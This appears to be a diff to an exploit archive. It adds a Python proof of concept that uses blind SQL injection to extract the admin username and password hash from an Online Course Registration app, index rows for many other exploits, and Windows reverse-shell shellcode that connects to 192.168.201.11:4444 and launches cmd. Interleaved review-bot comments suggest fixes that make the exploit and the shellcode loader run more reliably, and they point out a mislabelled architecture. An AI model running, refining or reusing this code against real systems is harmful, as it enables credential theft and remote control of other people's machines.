+    pass_list = map(str, pass_list)
+    pass_list = list(pass_list)
+
+    user_list = pass_list
+    user_list += list(string.ascii_uppercase)
+    user_list = map(str, user_list)
+    user_list = list(user_list)
+
+    session = requests.Session()
+
+    # This URL may change based on the implementation - change as needed
+    url = f"{hostname}/online-course-registration/Online/index.php"
+    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/index.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
+    data = {"regno": f"{username}", "password": f"{password}", "submit": ''}
+    r = session.post(url, headers=headers, data=data)
+
+
+    print("Admin username:")
+    # This range number is pretty arbitrary, so change it to whatever you feel like
+    for i in range(1,33):
+        counter = 0
+        find = False
+        for j in user_list:
+            # This URL may change based on the implementation - change as needed
+            url = f"{hostname}/online-course-registration/Online/pincode-verification.php"
+            headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
+            data = {"pincode": f"' or (select(select (substring(username,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''}
+            a = session.post(url, headers=headers, data=data)
+            counter += 1
+            if 'Course Enroll' in a.text:
+                sys.stdout.write(j)
+                sys.stdout.flush()
+                break
+            elif counter == len(user_list):
+                find = True
+                break
+        if find:
+            break
+
+    print("\n")
+    print("Admin password hash:")
+    # This range is not arbitrary and will cover md5 hashing - if the hashing implementation is different, change as needed
+    for i in range(1,33):
+        counter = 0
+        find = False
+        for j in pass_list:
+            url = f"{hostname}/online-course-registration/Online/pincode-verification.php"
+            headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
+            data = {"pincode": f"' or (select(select (substring(password,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''}
+            a = session.post(url, headers=headers, data=data)
+            counter += 1
+            if 'Course Enroll' in a.text:
+                sys.stdout.write(j)
+                sys.stdout.flush()
+                break
+            elif counter == len(pass_list):
+                find = True
+                break
+        if find:
+            break
+
+    print("\n\nSuccessfully pwnd :)")
+
+def logo():
+    art = R'''
+__/\\\\\\\\\\\\\____/\\\\\\\\\\\__/\\\\\_____/\\\__/\\\\_________/\\\__
+ _\/\\\/////////\\\_\/////\\\///__\/\\\\\\___\/\\\_\///\\________\/\\\__
+  _\/\\\_______\/\\\_____\/\\\_____\/\\\/\\\__\/\\\__/\\/_________\/\\\__
+   _\/\\\\\\\\\\\\\/______\/\\\_____\/\\\//\\\_\/\\\_\//___________\/\\\__
+    _\/\\\/////////________\/\\\_____\/\\\\//\\\\/\\\__________/\\\\\\\\\__
+     _\/\\\_________________\/\\\_____\/\\\_\//\\\/\\\_________/\\\////\\\__
+      _\/\\\_________________\/\\\_____\/\\\__\//\\\\\\________\/\\\__\/\\\__
+       _\/\\\______________/\\\\\\\\\\\_\/\\\___\//\\\\\________\//\\\\\\\/\\_
+        _\///______________\///////////__\///_____\/////__________\///////\//__
+    '''
+    info = 'CVE-2021-37357 PoC'.center(76)
+    credits = 'Created by @AffineSecurity and @qhum7sec'.center(76)
+    print(f"{art}\n{info}\n{credits}")
+
+def main():
+    logo()
+    hostname = sys.argv[1]
+    username = sys.argv[2]
+    password = sys.argv[3]
+
+    if len(sys.argv) != 4:
+        print("Usage: python3 exploit.py http://127.0.0.1:80 username password")
+
+    exploit(hostname, username, password)
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
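Review bot: `user_list = pass_list` on L718 aliases the same list, so the `+=` on L719 also appends the uppercase letters to `pass_list`; the hash loop on L760 then tries 62 candidates per position instead of 36 — harmless for correctness but it nearly doubles the requests. Use `user_list = list(pass_list)`, and if the stored value is a lowercase md5 hex digest as the comment on L756 suggests, `pass_list = list(string.hexdigits[:16])` cuts the hash phase further. In `main()` the `sys.argv[1..3]` reads on L796–L798 precede the length check on L800, so a missing argument raises IndexError before the usage line prints, and the check never `sys.exit(1)`s; move the check first and exit. The `find` flag on L749/L771 treats the first position with no match as end-of-string, so any character outside the candidate set truncates the result silently — worth a comment.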
diff --git a/files_exploits.csv b/files_exploits.csv
index 1f5bcc305..4c75f74a1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44182,6 +44182,7 @@ id,file,description,date,author,type,platform,port
 50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",1970-01-01,"Luca Bernardi",webapps,php,
 50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",1970-01-01,"Bryan Leong",webapps,php,
 50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Simone Cristofaro",webapps,php,
+50132,exploits/hardware/webapps/50132.py,"Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection",1970-01-01,"Metin Yunus Kandemir",webapps,hardware,
 50137,exploits/php/webapps/50137.txt,"WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)",1970-01-01,nhattruong,webapps,php,
 50138,exploits/php/webapps/50138.txt,"WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation",1970-01-01,nhattruong,webapps,php,
 50139,exploits/php/webapps/50139.txt,"WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)",1970-01-01,"Vikas Srivastava",webapps,php,
@@ -44264,9 +44265,11 @@ id,file,description,date,author,type,platform,port
 50256,exploits/php/webapps/50256.txt,"WordPress Plugin Duplicate Page 4.4.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
 50254,exploits/hardware/webapps/50254.txt,"Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure",1970-01-01,icekam,webapps,hardware,
 50255,exploits/multiple/webapps/50255.txt,"WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Sentinal920,webapps,multiple,
+50259,exploits/php/webapps/50259.txt,"OpenSIS 8.0 'modname' - Directory Traversal",1970-01-01,"Eric Salario",webapps,php,
 50260,exploits/php/webapps/50260.txt,"OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)",1970-01-01,"Allen Enosh Upputori",webapps,php,
 50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mason Soroka-Gill",webapps,php,
 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php,
+50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload",1970-01-01,a-rey,webapps,php,
 50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple,
 50268,exploits/php/webapps/50268.txt,"WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
 50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php,
@@ -44308,6 +44311,7 @@ id,file,description,date,author,type,platform,port
 50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,V1n1v131r4,webapps,php,
 50324,exploits/php/webapps/50324.txt,"WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
 50325,exploits/php/webapps/50325.html,"WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)",1970-01-01,0xB9,webapps,php,
+50326,exploits/php/webapps/50326.txt,"Budget and Expense Tracker System 1.0 - Arbitrary File Upload",1970-01-01,"()t/\\/\\1",webapps,php,
 50327,exploits/php/webapps/50327.txt,"Police Crime Record Management Project 1.0 - Time Based SQLi",1970-01-01,"()t/\\/\\1",webapps,php,
 50328,exploits/aspx/webapps/50328.txt,"SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure",1970-01-01,"Andrei Manole",webapps,aspx,
 50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php,
@@ -44315,11 +44319,14 @@ id,file,description,date,author,type,platform,port
 50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php,
 50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware,
 50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
+50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware,
+50342,exploits/hardware/webapps/50342.py,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation",1970-01-01,LiquidWorm,webapps,hardware,
 50343,exploits/php/webapps/50343.txt,"WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Nosa Shandy",webapps,php,
 50344,exploits/php/webapps/50344.txt,"WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
 50345,exploits/php/webapps/50345.txt,"WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
 50346,exploits/php/webapps/50346.txt,"WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
 50348,exploits/php/webapps/50348.py,"Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php,
+50350,exploits/php/webapps/50350.txt,"WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting",1970-01-01,0xB9,webapps,php,
 50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Eric Salario",webapps,php,
 50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Mr.Gedik,webapps,php,
 50355,exploits/php/webapps/50355.txt,"Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
@@ -44383,3 +44390,6 @@ id,file,description,date,author,type,platform,port
 50437,exploits/windows/webapps/50437.txt,"Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read",1970-01-01,z4nd3r,webapps,windows,
 50432,exploits/php/webapps/50432.txt,"Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation",1970-01-01,"Oscar Gil Gutierrez",webapps,php,
 50435,exploits/php/webapps/50435.txt,"Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)",1970-01-01,Ghuliev,webapps,php,
+50438,exploits/java/webapps/50438.txt,"Jetty 9.4.37.v20210219 - Information Disclosure",1970-01-01,"Mayank Deshmukh",webapps,java,
+50439,exploits/php/webapps/50439.py,"Clinic Management System 1.0 - SQL injection to Remote Code Execution",1970-01-01,"Pablo Santiago",webapps,php,
+50440,exploits/php/webapps/50440.txt,"Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)",1970-01-01,"Sam Ferguson",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 3dd8bb7f2..183fffa14 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1025,3 +1025,4 @@ id,file,description,date,author,type,platform
 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86
 48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86
 48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86
+50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
diff --git a/shellcodes/windows_x86-64/50291.c b/shellcodes/windows_x86-64/50291.c
new file mode 100644
index 000000000..16f87a8c9
--- /dev/null
+++ b/shellcodes/windows_x86-64/50291.c
@@ -0,0 +1,290 @@
+# Title: Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
+# Date: 09.12.2021
+# Author: Xenofon Vassilakopoulos
+# Tested on: Windows/x64 - 10.0.19043 N/A Build 19043
+
+/*
+
+MIT License
+
+Copyright (c) 2021 Xenofon Vassilakopoulos
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
+
+
+[BITS 32]
+
+global _start
+
+section .text
+
+_start:
+
+; Locate Kernelbase.dll address
+XOR ECX, ECX							;zero out ECX
+MOV EAX, FS:[ecx + 0x30]				;EAX = PEB
+MOV EAX, [EAX + 0x0c]					;EAX = PEB->Ldr
+MOV ESI, [EAX + 0x14]					;ESI = PEB->Ldr.InMemoryOrderModuleList
+LODSD									;memory address of the second list entry structure
+XCHG EAX, ESI							;EAX = ESI , ESI = EAX
+LODSD									;memory address of the third list entry structure
+XCHG EAX, ESI							;EAX = ESI , ESI = EAX
+LODSD									;memory address of the fourth list entry structure
+MOV EBX, [EAX + 0x10]					;EBX = Base address
+
+; Export Table
+MOV EDX, DWORD  [EBX + 0x3C]			;EDX = DOS->e_lfanew
+ADD EDX, EBX							;EDX = PE Header
+MOV EDX, DWORD  [EDX + 0x78]			;EDX = Offset export table
+ADD EDX, EBX							;EDX = Export table
+MOV ESI, DWORD  [EDX + 0x20]			;ESI = Offset names table
+ADD ESI, EBX							;ESI = Names table
+XOR ECX, ECX							;EXC = 0
+
+GetFunction :
+
+INC ECX; increment counter
+LODSD									;Get name offset
+ADD EAX, EBX							;Get function name
+CMP dword [EAX], 0x50746547				;"PteG"
+JNZ SHORT GetFunction					;jump to GetFunction label if not "GetP"
+CMP dword [EAX + 0x4], 0x41636F72		;"rocA"
+JNZ SHORT GetFunction					;jump to GetFunction label if not "rocA"
+CMP dword [EAX + 0x8], 0x65726464		;"ddre"
+JNZ SHORT GetFunction					;jump to GetFunction label if not "ddre"
+
+MOV ESI, DWORD [EDX + 0x24]	    		;ESI = Offset ordinals
+ADD ESI, EBX							;ESI = Ordinals table
+MOV CX,  WORD [ESI + ECX * 2]			;CX = Number of function
+DEC ECX									;Decrement the ordinal
+MOV ESI, DWORD [EDX + 0x1C]	    		;ESI = Offset address table
+ADD ESI, EBX							;ESI = Address table
+MOV EDX, DWORD [ESI + ECX * 4]			;EDX = Pointer(offset)
+ADD EDX, EBX							;EDX = GetProcAddress
+
+; Get the Address of LoadLibraryA function
+XOR ECX, ECX						 ;ECX = 0
+PUSH EBX							 ;Kernel32 base address
+PUSH EDX							 ;GetProcAddress
+PUSH ECX							 ;0
+PUSH 0x41797261						 ;"Ayra"
+PUSH 0x7262694C						 ;"rbiL"
+PUSH 0x64616F4C						 ;"daoL"
+PUSH ESP							 ;"LoadLibrary"
+PUSH EBX							 ;Kernel32 base address
+MOV  ESI, EBX						 ;save the kernel32 address in esi for later
+CALL EDX							 ;GetProcAddress(LoadLibraryA)
+
+ADD ESP, 0xC						 ;pop "LoadLibraryA"
+POP EDX								 ;EDX = 0
+PUSH EAX							 ;EAX = LoadLibraryA
+PUSH EDX							 ;ECX = 0
+MOV DX, 0x6C6C						 ;"ll"
+PUSH EDX
+PUSH 0x642E3233						 ;"d.23"
+PUSH 0x5F327377						 ;"_2sw"
+PUSH ESP							 ;"ws2_32.dll"
+CALL EAX							 ;LoadLibrary("ws2_32.dll")
+
+ADD  ESP, 0x10						 ;Clean stack
+MOV  EDX, [ESP + 0x4]				 ;EDX = GetProcAddress
+PUSH 0x61617075						 ;"aapu"
+SUB  word [ESP + 0x2], 0x6161		 ;"pu" (remove "aa")
+PUSH 0x74726174						 ;"trat"
+PUSH 0x53415357						 ;"SASW"
+PUSH ESP							 ;"WSAStartup"
+PUSH EAX							 ;ws2_32.dll address
+MOV	 EDI, EAX						 ;save ws2_32.dll to use it later
+CALL EDX							 ;GetProcAddress(WSAStartup)
+
+; Call WSAStartUp
+XOR  EBX, EBX						 ;zero out ebx register
+MOV  BX, 0x0190						 ;EAX = sizeof(struct WSAData)
+SUB  ESP, EBX						 ;allocate space for the WSAData structure
+PUSH ESP							 ;push a pointer to WSAData structure
+PUSH EBX							 ;Push EBX as wVersionRequested
+CALL EAX							 ;Call WSAStartUp
+
+;Find the address of WSASocketA
+ADD  ESP, 0x10						 ;Align the stack
+XOR  EBX, EBX						 ;zero out the EBX register
+ADD  BL, 0x4						 ;add 0x4 at the lower register BL
+IMUL EBX, 0x64						 ;EBX = 0x190
+MOV  EDX, [ESP + EBX]				 ;EDX has the address of GetProcAddress
+PUSH 0x61614174						 ;"aaAt"
+SUB  word [ESP + 0x2], 0x6161	     ;"At" (remove "aa")
+PUSH  0x656b636f					 ;"ekco"
+PUSH  0x53415357				 	 ;"SASW"
+PUSH ESP							 ;"WSASocketA", GetProcAddress 2nd argument
+MOV  EAX, EDI						 ;EAX now holds the ws2_32.dll address
+PUSH EAX							 ;push the first argument of GetProcAddress
+CALL EDX							 ;call GetProcAddress
+PUSH EDI							 ;save the ws2_32.dll address to use it later
+
+;call WSASocketA
+XOR ECX, ECX						 ;zero out ECX register
+PUSH EDX							 ;null value for dwFlags argument
+PUSH EDX							 ;zero value since we dont have an existing socket group
+PUSH EDX							 ;null value for lpProtocolInfo
+MOV  DL, 0x6						 ;IPPROTO_TCP
+PUSH EDX							 ;set the protocol argument
+INC  ECX							 ;SOCK_STREAM(TCP)
+PUSH ECX							 ;set the type argument
+INC  ECX							 ;AF_INET(IPv4)
+PUSH ECX							 ;set the ddress family specification argument
+CALL EAX							 ;call WSASocketA
+XCHG EAX, ECX						 ;save the socket returned from WSASocketA at EAX to ECX in order to use it later
+
+;Find the address of connect
+POP  EDI                             ;load previously saved ws2_32.dll address to ECX
+ADD  ESP, 0x10                       ;Align stack
+XOR  EBX, EBX                        ;zero out EBX
+ADD  BL, 0x4                         ;add 0x4 to lower register BL
+IMUL EBX, 0x63                       ;EBX = 0x18c
+MOV  EDX, [ESP + EBX]                ;EDX has the address of GetProcAddress
+PUSH 0x61746365                      ;"atce"
+SUB  word [ESP + 0x3], 0x61		     ;"tce" (remove "a")
+PUSH 0x6e6e6f63                      ;"nnoc"
+PUSH ESP                             ;"connect", second argument of GetProcAddress
+PUSH EDI                             ;ws32_2.dll address, first argument of GetProcAddress
+XCHG ECX, EBP
+CALL EDX                             ;call GetProcAddress
+
+;call connect
+PUSH 0x0bc9a8c0                      ;sin_addr set to 192.168.201.11
+PUSH word 0x5c11				 	 ;port = 4444
+XOR  EBX, EBX                        ;zero out EBX
+add  BL, 0x2                         ;TCP protocol
+PUSH word BX						 ;push the protocol value on the stack
+MOV  EDX, ESP                        ;pointer to sockaddr structure (IP,Port,Protocol)
+PUSH byte  16					 	 ;the size of sockaddr - 3rd argument of connect
+PUSH EDX                             ;push the sockaddr - 2nd argument of connect
+PUSH EBP                             ;socket descriptor = 64 - 1st argument of connect
+XCHG EBP, EDI
+CALL EAX                             ;execute connect;
+
+;Find the address of CreateProcessA
+ADD  ESP, 0x14                       ;Clean stack
+XOR  EBX, EBX                        ;zero out EBX
+ADD  BL, 0x4                         ;add 0x4 to lower register BL
+IMUL EBX, 0x62                       ;EBX = 0x194
+MOV  EDX, [ESP + EBX]                ;EDX has the address of GetProcAddress
+PUSH 0x61614173                      ;"aaAs"
+SUB  dword [ESP + 0x2], 0x6161		 ;"As"
+PUSH 0x7365636f                      ;"seco"
+PUSH 0x72506574                      ;"rPet"
+PUSH 0x61657243                      ;"aerC"
+PUSH ESP                             ;"CreateProcessA" - 2nd argument of GetProcAddress
+MOV  EBP, ESI                        ;move the kernel32.dll to EBP
+PUSH EBP                             ;kernel32.dll address - 1st argument of GetProcAddress
+CALL EDX                             ;execute GetProcAddress
+PUSH EAX                             ;address of CreateProcessA
+LEA EBP, [EAX]                       ;EBP now points to the address of CreateProcessA
+
+;call CreateProcessA
+PUSH 0x61646d63                      ;"admc"
+SUB  word [ESP + 0x3], 0x61			 ;"dmc" ( remove a)
+MOV  ECX, ESP                        ;ecx now points to "cmd" string
+XOR  EDX, EDX                        ;zero out EDX
+SUB  ESP, 16
+MOV  EBX, esp                        ;pointer for ProcessInfo
+
+;STARTUPINFOA struct
+PUSH EDI                             ;hStdError  => saved socket
+PUSH EDI                             ;hStdOutput => saved socket
+PUSH EDI                             ;hStdInput  => saved socket
+PUSH EDX                             ;lpReserved2 => NULL
+PUSH EDX                             ;cbReserved2 => NULL
+XOR  EAX, EAX                        ;zero out EAX register
+INC  EAX                             ;EAX => 0x00000001
+ROL  EAX, 8                          ;EAX => 0x00000100
+PUSH EAX                             ;dwFlags => STARTF_USESTDHANDLES 0x00000100
+PUSH EDX                             ;dwFillAttribute => NULL
+PUSH EDX                             ;dwYCountChars => NULL
+PUSH EDX                             ;dwXCountChars => NULL
+PUSH EDX                             ;dwYSize => NULL
+PUSH EDX                             ;dwXSize => NULL
+PUSH EDX                             ;dwY => NULL
+PUSH EDX                             ;dwX => NULL
+PUSH EDX                             ;pTitle => NULL
+PUSH EDX                             ;pDesktop => NULL
+PUSH EDX                             ;pReserved => NULL
+XOR  EAX, EAX                        ;zero out EAX
+ADD  AL, 44                          ;cb => 0x44 (size of struct)
+PUSH EAX                             ;eax points to STARTUPINFOA
+
+;ProcessInfo struct
+MOV  EAX, ESP                        ;pStartupInfo
+PUSH EBX                             ;pProcessInfo
+PUSH EAX                             ;pStartupInfo
+PUSH EDX                             ;CurrentDirectory => NULL
+PUSH EDX                             ;pEnvironment => NULL
+PUSH EDX                             ;CreationFlags => 0
+XOR  EAX, EAX                        ;zero out EAX register
+INC  EAX                             ;EAX => 0x00000001
+PUSH EAX                             ;InheritHandles => TRUE => 1
+PUSH EDX                             ;pThreadAttributes => NULL
+PUSH EDX                             ;pProcessAttributes => NULL
+PUSH ECX                             ;pCommandLine => pointer to "cmd"
+PUSH EDX                             ;ApplicationName => NULL
+CALL EBP                             ;execute CreateProcessA
+
+*/
+
+#include <windows.h>
+#include <iostream>
+#include <stdlib.h>
+
+char code[] =
+"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x96\xad\x8b"
+"\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31"
+"\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f"
+"\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde"
+"\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xc9\x53"
+"\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54"
+"\x53\x89\xde\xff\xd2\x83\xc4\x0c\x5a\x50\x52\x66\xba\x6c\x6c\x52\x68\x33"
+"\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x04"
+"\x68\x75\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68"
+"\x57\x53\x41\x53\x54\x50\x89\xc7\xff\xd2\x31\xdb\x66\xbb\x90\x01\x29\xdc"
+"\x54\x53\xff\xd0\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b\xdb\x64\x8b\x14\x1c"
+"\x68\x74\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68"
+"\x57\x53\x41\x53\x54\x89\xf8\x50\xff\xd2\x57\x31\xc9\x52\x52\x52\xb2\x06"
+"\x52\x41\x51\x41\x51\xff\xd0\x91\x5f\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b"
+"\xdb\x63\x8b\x14\x1c\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03\x61\x68\x63"
+"\x6f\x6e\x6e\x54\x57\x87\xcd\xff\xd2\x68\xc0\xa8\xc9\x0b\x66\x68\x11\x5c"
+"\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x55\x87\xef\xff\xd0\x83"
+"\xc4\x14\x31\xdb\x80\xc3\x04\x6b\xdb\x62\x8b\x14\x1c\x68\x73\x41\x61\x61"
+"\x81\x6c\x24\x02\x61\x61\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72"
+"\x68\x43\x72\x65\x61\x54\x89\xf5\x55\xff\xd2\x50\x8d\x28\x68\x63\x6d\x64"
+"\x61\x66\x83\x6c\x24\x03\x61\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57"
+"\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52"
+"\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50"
+"\x52\x52\x51\x52\xff\xd5";
+
+int main(int argc, char** argv)
+{
+	//HWND hWnd = GetConsoleWindow();
+	//ShowWindow(hWnd, SW_HIDE);
+	printf("Shellcode Length:  %d\n", strlen(code));
+	void* exec = VirtualAlloc(0, strlen(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	memcpy(exec, code, sizeof(code));
+	((void(*)())exec)();
+
+	return 0;
+}
\ No newline at end of file
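Review bot: `strlen(code)` in `main` stops at the embedded `\x00\x00` inside the byte string (the `\x61\x61\x00\x00` run), so the printed length and the `VirtualAlloc` size describe a truncated buffer while `memcpy` copies `sizeof(code)`; use one length for all three, `size_t len = sizeof(code) - 1;` / `printf("Shellcode Length:  %zu\n", len);` / `void* exec = VirtualAlloc(0, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);`, and test `exec` for NULL before the copy. Those two NUL bytes appear to correspond to `SUB dword [ESP + 0x2], 0x6161`, where the sibling lines use `word`, which also makes the "330 Bytes" figure in the title and csv row hard to reconcile with the listing. The assembly is `[BITS 32]` and reads the PEB through `FS:[ecx + 0x30]`, i.e. 32-bit code, so the "Windows/x64" title and the `windows_x86-64` csv entry mislabel it; a header comment such as `; 32-bit (BITS 32) shellcode — confirm target bitness against the "x64" title` would make that explicit. The comment `; Locate 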